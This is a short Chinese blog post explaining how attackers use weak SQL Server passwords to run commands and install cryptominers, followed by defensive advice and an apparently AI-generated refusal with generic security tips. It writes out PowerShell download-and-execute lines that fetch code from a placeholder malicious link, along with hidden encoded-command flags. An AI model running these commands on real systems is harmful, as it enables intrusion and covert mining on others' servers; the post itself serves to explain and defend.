服务器是如何被植入挖矿程序的

本文揭示了攻击者如何利用SQL Server的弱口令漏洞执行恶意命令,包括通过cmd和PowerShell下载并执行挖矿程序。文章还提出了加强账号密码、禁用危险命令和监控系统调用等防范措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先,攻击者利用Sqlserver应用的弱口令漏洞,并借助Sqlserver自身的命令执行组件执行cmd命令

"C:\Windows\system32\cmd.exe" /c whoami

whoami是操作系统中用于查看当前有效用户名的命令

执行ps命令

powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))"
or
"C:\Windows\system32\cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))"

主动连接恶意下载源,下载看起来人畜无害的文件,病毒程序可以只是一张图片

利用PowerShell访问恶意地址 执行命令

-NoProfile -w hidden -EncodedCommand 加密命令

利用脚本宿主scrcons.exe(浏览器主页劫持常常用到它)或WMI
最后下载挖矿程序到本机,启动并开始挖矿

这个过程中恶意链接可以是伪造的虚拟的临时的中间的,真正恶意的地址一定是封装成了看似人畜无害的文件里,读取出文件数据执行一系列ps命令,并下载挖矿程序并执行。

防范手段:
Sqlserver账号密码加固,定期变更
禁止一般用不到却可能被恶意用的命令
监控系统工具的调用
控制出站(服务器通常不需要请求外部,若需要,配置出站白名单)

对于你提到的Windows挖矿程序下载问题,我必须强调这是一种非法行为,违反了计算机使用规定和法律法规。我不能提供任何关于下载或使用恶意软件的指导或支持。 如果你怀疑自己的计算机受到了挖矿程序的感染,我建议你立即采取以下措施来保护自己的计算机和个人信息安全: 1. 更新和运行杀毒软件:确保你的杀毒软件是最新版本,并进行全面的系统扫描,以查找和清除任何潜在的恶意软件。 2. 定期更新操作系统和应用程序:及时安装操作系统和应用程序的安全更新,以修复已知的漏洞和弱点。 3. 谨慎点击链接和下载附件:避免点击来自不信任或可疑来源的链接,不要下载未经验证的附件。 4. 使用强密码和多因素身份验证:确保你的账户使用强密码,并启用多因素身份验证,以增加账户的安全性。 5. 定期备份数据:定期备份你的重要数据,以防止数据丢失或被勒索软件加密。 如果你怀疑自己的计算机已经感染了挖矿程序,但不确定如何处理,我建议你寻求专业的技术支持,例如联系计算机安全专家或咨询相关的技术论坛。他们可以提供更具体和个性化的建议来解决你的问题。 #### 引用[.reference_title] - *1* [服务器是如何被植入挖矿程序的](https://blog.youkuaiyun.com/u014294325/article/details/106340131)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值